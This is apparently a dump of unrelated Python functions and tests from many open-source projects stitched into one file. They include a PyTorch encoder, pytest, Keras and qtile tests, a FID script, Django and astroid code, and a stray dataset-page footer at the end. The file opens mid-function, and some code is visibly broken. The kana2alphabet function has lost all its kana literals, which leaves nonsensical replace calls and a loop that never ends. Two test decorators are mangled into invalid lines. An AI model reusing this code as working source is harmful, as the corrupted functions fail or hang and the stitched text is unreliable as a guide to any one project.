                # BUG FIX: this statement was a bare tuple expression and
                # never executed, so `extra` was silently never updated.
                curs.execute('UPDATE marker SET extra = :data WHERE name = :name', (data, name))
        else:
            if data is None:
                data = ''
            curs.execute('INSERT INTO marker (name, last_date, extra) VALUES (:name, :now, :data)', (name, datetime.datetime.now(), data))
class ConvolutionalEncoder(nn.Module):
    """Convolutional encoder producing a feature map plus per-stage skips.

    The first stage is a stride-1 convolution followed by ``n_resblocks``
    residual blocks; each subsequent stage downsamples with 2x2 max-pooling,
    projects channels with a 1x1 convolution, then applies another
    ``n_resblocks`` residual blocks.  Dropout ramps linearly from
    ``dropout_min`` (first stage) to ``dropout_max`` (last stage).
    """

    def __init__(self, n_features_input, num_hidden_features, kernel_size, padding, n_resblocks, dropout_min=0, dropout_max=0.2, blockObject=ResidualBlock, batchNormObject=nn.BatchNorm2d):
        super(ConvolutionalEncoder, self).__init__()
        self.n_features_input = n_features_input
        self.num_hidden_features = num_hidden_features
        self.stages = nn.ModuleList()
        # One dropout value per stage, linearly interpolated between bounds.
        # Bug fix: the original did `next(iter(dropout))` on a list, which
        # restarts iteration every call and always yielded dropout_min,
        # making the linspace schedule dead code.  Use a single iterator so
        # each stage advances to its own dropout value.
        dropout_schedule = iter([((1 - t) * dropout_min) + (t * dropout_max)
                                 for t in np.linspace(0, 1, len(num_hidden_features))])
        # First stage: stride-1 conv + residual blocks (no downsampling).
        block = [nn.Conv2d(n_features_input, num_hidden_features[0], kernel_size=kernel_size, stride=1, padding=padding)]
        p = next(dropout_schedule)
        for _ in range(n_resblocks):
            block += [blockObject(num_hidden_features[0], kernel_size, padding, dropout=p, batchNormObject=batchNormObject)]
        self.stages.append(nn.Sequential(*block))
        # Downsampling stages over consecutive channel-count pairs.
        for (features_in, features_out) in zip(num_hidden_features, num_hidden_features[1:]):
            block = [nn.MaxPool2d(2), nn.Conv2d(features_in, features_out, kernel_size=1, padding=0), batchNormObject(features_out), nn.ReLU()]
            p = next(dropout_schedule)
            for _ in range(n_resblocks):
                block += [blockObject(features_out, kernel_size, padding, dropout=p, batchNormObject=batchNormObject)]
            self.stages.append(nn.Sequential(*block))

    def forward(self, x):
        """Run every stage in order; return (final features, per-stage outputs)."""
        skips = []
        for stage in self.stages:
            x = stage(x)
            skips.append(x)
        return (x, skips)

    def getInputShape(self):
        # (batch, channels, H, W) with free batch/spatial dimensions.
        return ((- 1), self.n_features_input, (- 1), (- 1))

    def getOutputShape(self):
        return ((- 1), self.num_hidden_features[(- 1)], (- 1), (- 1))
_config
def test_matrix_simple(manager):
    """Windows fill the matrix layout row by row, two per row."""
    expected_after_window = [
        ('one', [['one']]),
        ('two', [['one', 'two']]),
        ('three', [['one', 'two'], ['three']]),
    ]
    for name, rows in expected_after_window:
        manager.test_window(name)
        assert manager.c.layout.info()['rows'] == rows
def get_configs_from_multiple_files():
    """Load the train, model and input-reader configs from their separate
    text-format protobuf files (paths taken from FLAGS).

    Returns:
        (model_config, train_config, input_config) tuple of parsed messages.
    """
    def _merge_from_file(path, proto):
        # Parse one text-format protobuf file into the given message.
        with tf.gfile.GFile(path, 'r') as f:
            text_format.Merge(f.read(), proto)
        return proto

    train_config = _merge_from_file(FLAGS.train_config_path, train_pb2.TrainConfig())
    model_config = _merge_from_file(FLAGS.model_config_path, model_pb2.DetectionModel())
    input_config = _merge_from_file(FLAGS.input_config_path, input_reader_pb2.InputReader())
    return (model_config, train_config, input_config)
def kana2alphabet(text):
    # Convert kana text to romaji: digraphs (kya, sha, ...) first, then single
    # kana, then a KANA2HEP table pass, finally sokuon (small-tsu) gemination.
    #
    # NOTE(review): every `.replace('', ...)` below has LOST its kana literal
    # (non-ASCII characters were stripped from this copy of the file).  As
    # written, `str.replace('', x)` inserts x between every character, and the
    # `while ('' in text)` loop below can never terminate for len(text) > 1
    # ('' is a substring of every string and index('') is always 0).  Restore
    # the kana literals from the upstream source before using this function.
    text = text.replace('', 'kya').replace('', 'kyu').replace('', 'kyo')
    text = text.replace('', 'gya').replace('', 'gyu').replace('', 'gyo')
    text = text.replace('', 'sha').replace('', 'shu').replace('', 'sho')
    text = text.replace('', 'ja').replace('', 'ju').replace('', 'jo')
    text = text.replace('', 'cha').replace('', 'chu').replace('', 'cho')
    text = text.replace('', 'nya').replace('', 'nyu').replace('', 'nyo')
    text = text.replace('', 'fa').replace('', 'fi').replace('', 'fe')
    text = text.replace('', 'fo')
    text = text.replace('', 'hya').replace('', 'hyu').replace('', 'hyo')
    text = text.replace('', 'mya').replace('', 'myu').replace('', 'myo')
    text = text.replace('', 'rya').replace('', 'ryu').replace('', 'ryo')
    text = text.replace('', 'bya').replace('', 'byu').replace('', 'byo')
    text = text.replace('', 'pya').replace('', 'pyu').replace('', 'pyo')
    # Single kana with voiced/semi-voiced consonants.
    text = text.replace('', 'ga').replace('', 'gi').replace('', 'gu')
    text = text.replace('', 'ge').replace('', 'go').replace('', 'za')
    text = text.replace('', 'ji').replace('', 'zu').replace('', 'ze')
    text = text.replace('', 'zo').replace('', 'da').replace('', 'ji')
    text = text.replace('', 'zu').replace('', 'de').replace('', 'do')
    text = text.replace('', 'ba').replace('', 'bi').replace('', 'bu')
    text = text.replace('', 'be').replace('', 'bo').replace('', 'pa')
    text = text.replace('', 'pi').replace('', 'pu').replace('', 'pe')
    text = text.replace('', 'po')
    # Plain (unvoiced) kana rows.
    text = text.replace('', 'ka').replace('', 'ki').replace('', 'ku')
    text = text.replace('', 'ke').replace('', 'ko').replace('', 'sa')
    text = text.replace('', 'shi').replace('', 'su').replace('', 'se')
    text = text.replace('', 'so').replace('', 'ta').replace('', 'chi')
    text = text.replace('', 'tsu').replace('', 'te').replace('', 'to')
    text = text.replace('', 'na').replace('', 'ni').replace('', 'nu')
    text = text.replace('', 'ne').replace('', 'no').replace('', 'ha')
    text = text.replace('', 'hi').replace('', 'fu').replace('', 'he')
    text = text.replace('', 'ho').replace('', 'ma').replace('', 'mi')
    text = text.replace('', 'mu').replace('', 'me').replace('', 'mo')
    text = text.replace('', 'ra').replace('', 'ri').replace('', 'ru')
    text = text.replace('', 're').replace('', 'ro')
    text = text.replace('', 'ya').replace('', 'yu').replace('', 'yo')
    text = text.replace('', 'wa').replace('', 'wi').replace('', 'wo')
    text = text.replace('', 'we')
    # Remaining kana handled via the KANA2HEP lookup table.
    text = _convert(text, KANA2HEP)
    # Sokuon handling: double the following consonant; trailing sokuon
    # becomes 'xtsu'.  (Literal lost here too -- see NOTE above.)
    while ('' in text):
        text = list(text)
        tsu_pos = text.index('')
        if (len(text) <= (tsu_pos + 1)):
            return (''.join(text[:(- 1)]) + 'xtsu')
        if (tsu_pos == 0):
            text[tsu_pos] = 'xtsu'
        else:
            text[tsu_pos] = text[(tsu_pos + 1)]
        text = ''.join(text)
    return text
def pytest_addoption(parser):
    """Register the pytest-timeout command-line options and ini settings."""
    timeout_group = parser.getgroup('timeout', 'Interrupt test run and dump stacks of all threads after a test times out')
    timeout_group.addoption('--timeout', type=float, help=TIMEOUT_DESC)
    # Old underscore spelling kept as a deprecated alias.
    timeout_group.addoption('--timeout_method', action='store', choices=['signal', 'thread'], help='Deprecated, use --timeout-method')
    timeout_group.addoption('--timeout-method', dest='timeout_method', action='store', choices=['signal', 'thread'], help=METHOD_DESC)
    timeout_group.addoption('--timeout-disable-debugger-detection', dest='timeout_disable_debugger_detection', action='store_true', help=DISABLE_DEBUGGER_DETECTION_DESC)
    # Matching ini-file settings.
    for ini_name, ini_desc in (('timeout', TIMEOUT_DESC), ('timeout_method', METHOD_DESC)):
        parser.addini(ini_name, ini_desc)
    parser.addini('timeout_func_only', FUNC_ONLY_DESC, type='bool', default=False)
    parser.addini('timeout_disable_debugger_detection', DISABLE_DEBUGGER_DETECTION_DESC, type='bool', default=False)
def test_show_different_scopes(pytester: Pytester, mode) -> None:
    """Setup/teardown output labels fixtures with their scope (S/F).

    Bug fix: the embedded test source had lost its ``@pytest.fixture``
    decorator lines (only the stray ``(scope='session')`` remnant was left),
    so the generated module defined plain functions instead of fixtures and
    the inner test could not have passed.  The decorators are restored here.
    """
    p = pytester.makepyfile(
        '''
        import pytest

        @pytest.fixture
        def arg_function():
            """function scoped fixture"""

        @pytest.fixture(scope="session")
        def arg_session():
            """session scoped fixture"""

        def test_arg1(arg_session, arg_function):
            pass
        '''
    )
    result = pytester.runpytest(mode, p)
    assert (result.ret == 0)
    result.stdout.fnmatch_lines(['SETUP S arg_session*', '*SETUP F arg_function*', '*test_arg1 (fixtures used: arg_function, arg_session)*', '*TEARDOWN F arg_function*', 'TEARDOWN S arg_session*'])
# NOTE(review): the two lines below look like mangled decorators (probably
# `@pytest.mark.skipif(...)` and `@keras_test`); as written they are not
# valid statements -- confirm against the upstream test module.
.skipif((K.backend() != 'tensorflow'), reason='Requires TF backend')
_test
def test_model_with_input_feed_tensor():
    # Models whose input is backed by a pre-fed TF tensor can be trained,
    # evaluated and used for prediction while feeding only the remaining
    # placeholder inputs.  Three scenarios are exercised:
    #   1. two inputs, one fed by a tf.Variable;
    #   2. a single tensor-fed input with an intermediate Dropout;
    #   3. a single tensor-fed input without Dropout.
    import tensorflow as tf
    input_a_np = np.random.random((10, 3))
    input_b_np = np.random.random((10, 3))
    output_a_np = np.random.random((10, 4))
    output_b_np = np.random.random((10, 3))
    # Scenario 1: `a` is backed by a TF variable, `b` is a normal placeholder.
    a = Input(tensor=tf.Variable(input_a_np, dtype=tf.float32))
    b = Input(shape=(3,), name='input_b')
    a_2 = Dense(4, name='dense_1')(a)
    dp = Dropout(0.5, name='dropout')
    b_2 = dp(b)
    model = Model([a, b], [a_2, b_2])
    model.summary()
    optimizer = 'rmsprop'
    loss = 'mse'
    loss_weights = [1.0, 0.5]
    model.compile(optimizer, loss, metrics=['mean_squared_error'], loss_weights=loss_weights, sample_weight_mode=None)
    # Only input_b must be fed; both array and dict forms are accepted.
    out = model.train_on_batch(input_b_np, [output_a_np, output_b_np])
    out = model.train_on_batch({'input_b': input_b_np}, [output_a_np, output_b_np])
    out = model.test_on_batch({'input_b': input_b_np}, [output_a_np, output_b_np])
    out = model.predict_on_batch({'input_b': input_b_np})
    out = model.fit({'input_b': input_b_np}, [output_a_np, output_b_np], epochs=1, batch_size=10)
    out = model.fit(input_b_np, [output_a_np, output_b_np], epochs=1, batch_size=10)
    out = model.evaluate({'input_b': input_b_np}, [output_a_np, output_b_np], batch_size=10)
    out = model.evaluate(input_b_np, [output_a_np, output_b_np], batch_size=10)
    out = model.predict({'input_b': input_b_np}, batch_size=10)
    out = model.predict(input_b_np, batch_size=10)
    assert (len(out) == 2)
    # Scenario 2: single tensor-fed input with Dropout; nothing needs feeding,
    # so None/[]/{}-style inputs must all be accepted.
    a = Input(tensor=tf.Variable(input_a_np, dtype=tf.float32))
    a_2 = Dense(4, name='dense_1')(a)
    a_2 = Dropout(0.5, name='dropout')(a_2)
    model = Model(a, a_2)
    model.summary()
    optimizer = 'rmsprop'
    loss = 'mse'
    model.compile(optimizer, loss, metrics=['mean_squared_error'])
    out = model.train_on_batch(None, output_a_np)
    out = model.train_on_batch(None, output_a_np)
    out = model.test_on_batch(None, output_a_np)
    out = model.predict_on_batch(None)
    out = model.train_on_batch([], output_a_np)
    out = model.train_on_batch({}, output_a_np)
    out = model.fit(None, output_a_np, epochs=1, batch_size=10)
    out = model.fit(None, output_a_np, epochs=1, batch_size=10)
    out = model.evaluate(None, output_a_np, batch_size=10)
    out = model.evaluate(None, output_a_np, batch_size=10)
    out = model.predict(None, steps=3)
    out = model.predict(None, steps=3)
    # 3 steps over the 10-row fed variable -> 30 predictions of width 4.
    assert (out.shape == ((10 * 3), 4))
    # Scenario 3: same as scenario 2 but without the Dropout layer.
    a = Input(tensor=tf.Variable(input_a_np, dtype=tf.float32))
    a_2 = Dense(4, name='dense_1')(a)
    model = Model(a, a_2)
    model.summary()
    optimizer = 'rmsprop'
    loss = 'mse'
    model.compile(optimizer, loss, metrics=['mean_squared_error'])
    out = model.train_on_batch(None, output_a_np)
    out = model.train_on_batch(None, output_a_np)
    out = model.test_on_batch(None, output_a_np)
    out = model.predict_on_batch(None)
    out = model.train_on_batch([], output_a_np)
    out = model.train_on_batch({}, output_a_np)
    out = model.fit(None, output_a_np, epochs=1, batch_size=10)
    out = model.fit(None, output_a_np, epochs=1, batch_size=10)
    out = model.evaluate(None, output_a_np, batch_size=10)
    out = model.evaluate(None, output_a_np, batch_size=10)
    out = model.predict(None, steps=3)
    out = model.predict(None, steps=3)
    assert (out.shape == ((10 * 3), 4))
def _get_number_symbols(locale: ((Locale | str) | None), *, numbering_system: (Literal['default'] | str)='latn') -> LocaleDataDict:
    """Return the number-symbol data of *locale* for *numbering_system*.

    The numbering system name is first resolved (e.g. ``'default'`` to the
    locale's default system).  Raises UnsupportedNumberingSystemError when
    the locale has no symbol data for the resolved system.
    """
    parsed_locale = Locale.parse(locale)
    numbering_system = _get_numbering_system(parsed_locale, numbering_system)
    try:
        symbols = parsed_locale.number_symbols[numbering_system]
    except KeyError as error:
        message = f'Unknown numbering system {numbering_system} for Locale {parsed_locale}.'
        raise UnsupportedNumberingSystemError(message) from error
    return symbols
class TagTreeModelManager(TagModelManager):
    """Manager for tree-structured tag models."""

    def get_queryset(self):
        # Use the tree-aware queryset subclass.
        return TagTreeModelQuerySet(self.model, using=self._db)
    # Alias for the pre-Django-1.6 spelling.
    get_query_set = get_queryset

    def rebuild(self):
        """Re-save every tag with a cleared slug so derived fields regenerate."""
        for tag in self.all():
            tag.slug = None
            tag.save()
    # Tell Django admin/shell helpers this method writes to the database.
    rebuild.alters_data = True

    def as_nested_list(self):
        """Return all tags as a nested list of ``(tag, children)`` pairs.

        Assumes name ordering matches tree order and that each tag exposes a
        1-based ``level`` attribute (1 = root).
        """
        qs = self.all().order_by('name')
        root = []
        # `stack` holds the (tag, children) pairs of the current ancestry path.
        stack = []
        for tag in qs:
            if (tag.level == 1):
                # New top-level tag: restart the ancestry path.
                stack = [(tag, [])]
                root.append(stack[0])
                continue
            (current_tag, current_children) = stack[(- 1)]
            if (tag.level <= current_tag.level):
                # Pop back up the stack to this tag's parent level.
                up = (current_tag.level - (tag.level - 1))
                del stack[(- up):]
                (current_tag, current_children) = stack[(- 1)]
            new_node = (tag, [])
            current_children.append(new_node)
            stack.append(new_node)
        return root
class GameOneHotSpottingLabelReader(GameOneHotLabelReaderInterface):
    """Reads a game's spotting labels as one-hot targets for both halves."""

    def __init__(self, soccernet_type: str, frame_rate: float, num_classes: int) -> None:
        # Frame rate used to map event timestamps onto frame indices.
        self._frame_rate = frame_rate
        self._num_classes = num_classes
        # Event-name -> class-index mapping for this SoccerNet variant.
        self._event_dictionary = choose_spotting_event_dictionary(soccernet_type)

    def read(self, game_labels_path: Optional[Path], len_half_one: int, len_half_two: int) -> Tuple[(LabelsAndValid, LabelsAndValid)]:
        """Return the (labels, valid) pair for each half; delegates to read_game_labels."""
        return read_game_labels(game_labels_path, self._event_dictionary, len_half_one, len_half_two, self._frame_rate, self._num_classes)
def calculate_fid_folder():
    """Compute FID between the images in a folder and precomputed dataset stats.

    Command-line driven: extracts Inception features from up to --num_sample
    images in `folder`, then compares their mean/covariance against the
    statistics stored at --fid_stats.
    """
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')

    parser = argparse.ArgumentParser()
    parser.add_argument('folder', type=str, help='Path to the folder.')
    parser.add_argument('--fid_stats', type=str, help='Path to the dataset fid statistics.')
    parser.add_argument('--batch_size', type=int, default=64)
    parser.add_argument('--num_sample', type=int, default=50000)
    parser.add_argument('--num_workers', type=int, default=4)
    parser.add_argument('--backend', type=str, default='disk', help='io backend for dataset. Option: disk, lmdb')
    args = parser.parse_args()

    inception = load_patched_inception_v3(device)

    # Dataset options: images normalized to [-1, 1] via mean/std of 0.5.
    opt = {
        'name': 'SingleImageDataset',
        'type': 'SingleImageDataset',
        'dataroot_lq': args.folder,
        'io_backend': {'type': args.backend},
        'mean': [0.5, 0.5, 0.5],
        'std': [0.5, 0.5, 0.5],
    }
    dataset = create_dataset(opt)
    data_loader = DataLoader(dataset=dataset, batch_size=args.batch_size, shuffle=False, num_workers=args.num_workers, sampler=None, drop_last=False)

    args.num_sample = min(args.num_sample, len(dataset))
    total_batch = math.ceil(args.num_sample / args.batch_size)

    def data_generator(loader, limit):
        # Yield at most `limit` batches of 'lq' images from the loader.
        for batch_idx, batch in enumerate(loader):
            if batch_idx >= limit:
                break
            yield batch['lq']

    features = extract_inception_features(data_generator(data_loader, total_batch), inception, total_batch, device)
    features = features.numpy()
    total_len = features.shape[0]
    features = features[:args.num_sample]
    print(f'Extracted {total_len} features, use the first {features.shape[0]} features to calculate stats.')

    sample_mean = np.mean(features, 0)
    sample_cov = np.cov(features, rowvar=False)

    stats = torch.load(args.fid_stats)
    real_mean = stats['mean']
    real_cov = stats['cov']

    fid = calculate_fid(sample_mean, sample_cov, real_mean, real_cov)
    print('fid:', fid)
class ManifestEntryList(List[ManifestEntry]):
    """A list of ManifestEntry objects that lazily wraps raw entries."""

    @staticmethod
    def of(entries: List[ManifestEntry]) -> 'ManifestEntryList':
        """Build a ManifestEntryList, wrapping any raw (non-ManifestEntry,
        non-None) entries in ManifestEntry.

        Fix: declared as a @staticmethod -- it was a plain function, which
        worked when called on the class (``ManifestEntryList.of(xs)``) but
        would silently misbind ``entries`` to the instance when called on an
        instance.  The return annotation is a string forward reference so it
        resolves regardless of ``from __future__ import annotations``.
        """
        manifest_entries = ManifestEntryList()
        for entry in entries:
            if entry is not None and not isinstance(entry, ManifestEntry):
                entry = ManifestEntry(entry)
            manifest_entries.append(entry)
        return manifest_entries

    def __getitem__(self, item):
        # Coerce-on-read: wrap the stored value in ManifestEntry on first
        # access and cache the wrapped value back into the list.
        val = super().__getitem__(item)
        if val is not None and not isinstance(val, ManifestEntry):
            self[item] = val = ManifestEntry(val)
        return val
class GeneratorModel(FunctionModel, ContextManagerModel):
    # Special-attributes model for generator objects (astroid brain): on
    # instantiation, every attribute of the builtins ``generator`` type is
    # exposed as a property on this model class so inference can find them.

    def __new__(cls, *args, **kwargs):
        ret = super().__new__(cls, *args, **kwargs)
        generator = AstroidManager().builtins_module['generator']
        for (name, values) in generator.locals.items():
            method = values[0]
            # Bind `method` through a default argument so each property
            # captures its own value (avoids the late-binding closure pitfall).
            def patched(cls, meth=method):
                return meth
            setattr(type(ret), (IMPL_PREFIX + name), property(patched))
        return ret

    def attr___name__(self):
        # A generator's __name__ is taken from the function that created it.
        return node_classes.Const(value=self._instance.parent.name, parent=self._instance)

    def attr___doc__(self):
        # __doc__ comes from the creating function's docstring (None if absent).
        return node_classes.Const(value=getattr(self._instance.parent.doc_node, 'value', None), parent=self._instance)
def _backend() -> str:
    """Describe the rendering backend in use, for version/debug output."""
    backend = objects.backend
    if backend == usertypes.Backend.QtWebKit:
        return 'new QtWebKit (WebKit {})'.format(qWebKitVersion())
    if backend == usertypes.Backend.QtWebEngine:
        avoid_init = 'avoid-chromium-init' in objects.debug_flags
        return str(qtwebengine_versions(avoid_init=avoid_init))
    raise utils.Unreachable(objects.backend)
def calculate_metrics(correct, guessed, total):
    """Build a Metrics record (tp, fp, fn, precision, recall, F1) from counts.

    ``correct`` are true positives, ``guessed`` the total predictions made,
    ``total`` the number of gold items.  Each ratio degrades to 0 when its
    denominator is zero.
    """
    tp = correct
    fp = guessed - correct
    fn = total - correct
    precision = (1.0 * tp) / (tp + fp) if (tp + fp) != 0 else 0
    recall = (1.0 * tp) / (tp + fn) if (tp + fn) != 0 else 0
    f_score = ((2 * precision) * recall) / (precision + recall) if (precision + recall) != 0 else 0
    return Metrics(tp, fp, fn, precision, recall, f_score)
class AddressBookUI(UserInterface):
    """Reahl user interface wiring together the address-book views."""

    def assemble(self):
        # '/add' shows the form for creating a new address.
        add = self.define_view('/add', title='Add an address')
        add.set_slot('main', AddAddressForm.factory())
        # '/edit' is parameterised by the id of the address being edited.
        self.edit = self.define_view('/edit', view_class=EditView, address_id=IntegerField())
        # '/' lists all addresses.
        addresses = self.define_view('/', title='Addresses')
        addresses.set_slot('main', AddressBookPanel.factory(self))
        # After saving or updating an address, navigate back to the list.
        self.define_transition(Address.events.save, add, addresses)
        self.define_transition(Address.events.update, self.edit, addresses)
        bookmarks = [f.as_bookmark(self) for f in [addresses, add]]
        self.define_page(AddressBookPage, bookmarks)

    def get_edit_bookmark(self, address, description=None):
        # Bookmark pointing at the edit view for one specific address.
        return self.edit.as_bookmark(self, address_id=address.id, description=description)
class TestTruncateExplanation():
    """Tests for truncate._truncate_explanation: line/char limits and the
    appended truncation message."""

    # The truncation notice itself occupies this many lines of the result.
    LINES_IN_TRUNCATION_MSG = 2

    def test_doesnt_truncate_when_input_is_empty_list(self) -> None:
        expl: List[str] = []
        result = truncate._truncate_explanation(expl, max_lines=8, max_chars=100)
        assert (result == expl)

    def test_doesnt_truncate_at_when_input_is_5_lines_and_LT_max_chars(self) -> None:
        expl = [('a' * 100) for x in range(5)]
        result = truncate._truncate_explanation(expl, max_lines=8, max_chars=(8 * 80))
        assert (result == expl)

    def test_truncates_at_8_lines_when_given_list_of_empty_strings(self) -> None:
        expl = ['' for x in range(50)]
        result = truncate._truncate_explanation(expl, max_lines=8, max_chars=100)
        assert (len(result) != len(expl))
        assert (result != expl)
        assert (len(result) == (8 + self.LINES_IN_TRUNCATION_MSG))
        assert ('Full output truncated' in result[(- 1)])
        assert ('42 lines hidden' in result[(- 1)])
        last_line_before_trunc_msg = result[((- self.LINES_IN_TRUNCATION_MSG) - 1)]
        assert last_line_before_trunc_msg.endswith('...')

    def test_truncates_at_8_lines_when_first_8_lines_are_LT_max_chars(self) -> None:
        total_lines = 100
        expl = ['a' for x in range(total_lines)]
        result = truncate._truncate_explanation(expl, max_lines=8, max_chars=(8 * 80))
        assert (result != expl)
        assert (len(result) == (8 + self.LINES_IN_TRUNCATION_MSG))
        assert ('Full output truncated' in result[(- 1)])
        assert (f'{(total_lines - 8)} lines hidden' in result[(- 1)])
        last_line_before_trunc_msg = result[((- self.LINES_IN_TRUNCATION_MSG) - 1)]
        assert last_line_before_trunc_msg.endswith('...')

    def test_truncates_at_8_lines_when_there_is_one_line_to_remove(self) -> None:
        # Removing a single line would not shorten the output once the
        # truncation message is added, so nothing is truncated.
        expl = ['a' for x in range(9)]
        result = truncate._truncate_explanation(expl, max_lines=8, max_chars=(8 * 80))
        assert (result == expl)
        assert ('truncated' not in result[(- 1)])

    def test_truncates_edgecase_when_truncation_message_makes_the_result_longer_for_chars(self) -> None:
        line = ('a' * 10)
        expl = [line, line]
        result = truncate._truncate_explanation(expl, max_lines=10, max_chars=10)
        assert (result == [line, line])

    def test_truncates_edgecase_when_truncation_message_makes_the_result_longer_for_lines(self) -> None:
        line = ('a' * 10)
        expl = [line, line]
        result = truncate._truncate_explanation(expl, max_lines=1, max_chars=100)
        assert (result == [line, line])

    def test_truncates_at_8_lines_when_first_8_lines_are_EQ_max_chars(self) -> None:
        expl = [(chr((97 + x)) * 80) for x in range(16)]
        result = truncate._truncate_explanation(expl, max_lines=8, max_chars=(8 * 80))
        assert (result != expl)
        assert (len(result) == ((16 - 8) + self.LINES_IN_TRUNCATION_MSG))
        assert ('Full output truncated' in result[(- 1)])
        assert ('8 lines hidden' in result[(- 1)])
        last_line_before_trunc_msg = result[((- self.LINES_IN_TRUNCATION_MSG) - 1)]
        assert last_line_before_trunc_msg.endswith('...')

    def test_truncates_at_4_lines_when_first_4_lines_are_GT_max_chars(self) -> None:
        # The char budget is exhausted before the line budget.
        expl = [('a' * 250) for x in range(10)]
        result = truncate._truncate_explanation(expl, max_lines=8, max_chars=999)
        assert (result != expl)
        assert (len(result) == (4 + self.LINES_IN_TRUNCATION_MSG))
        assert ('Full output truncated' in result[(- 1)])
        assert ('7 lines hidden' in result[(- 1)])
        last_line_before_trunc_msg = result[((- self.LINES_IN_TRUNCATION_MSG) - 1)]
        assert last_line_before_trunc_msg.endswith('...')

    def test_truncates_at_1_line_when_first_line_is_GT_max_chars(self) -> None:
        expl = [('a' * 250) for x in range(1000)]
        result = truncate._truncate_explanation(expl, max_lines=8, max_chars=100)
        assert (result != expl)
        assert (len(result) == (1 + self.LINES_IN_TRUNCATION_MSG))
        assert ('Full output truncated' in result[(- 1)])
        assert ('1000 lines hidden' in result[(- 1)])
        last_line_before_trunc_msg = result[((- self.LINES_IN_TRUNCATION_MSG) - 1)]
        assert last_line_before_trunc_msg.endswith('...')

    def test_full_output_truncated(self, monkeypatch, pytester: Pytester) -> None:
        # End-to-end: truncation active by default (no CI env), disabled by
        # -vv and by CI=1.
        line_count = 7
        line_len = 100
        expected_truncated_lines = 2
        pytester.makepyfile(("\n def test_many_lines():\n a = list([str(i)[0] * %d for i in range(%d)])\n b = a[::2]\n a = '\\n'.join(map(str, a))\n b = '\\n'.join(map(str, b))\n assert a == b\n " % (line_len, line_count)))
        monkeypatch.delenv('CI', raising=False)
        result = pytester.runpytest()
        result.stdout.fnmatch_lines(['*+ 1*', '*+ 3*', ('*truncated (%d lines hidden)*use*-vv*' % expected_truncated_lines)])
        result = pytester.runpytest('-vv')
        result.stdout.fnmatch_lines(['* 6*'])
        monkeypatch.setenv('CI', '1')
        result = pytester.runpytest()
        result.stdout.fnmatch_lines(['* 6*'])
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.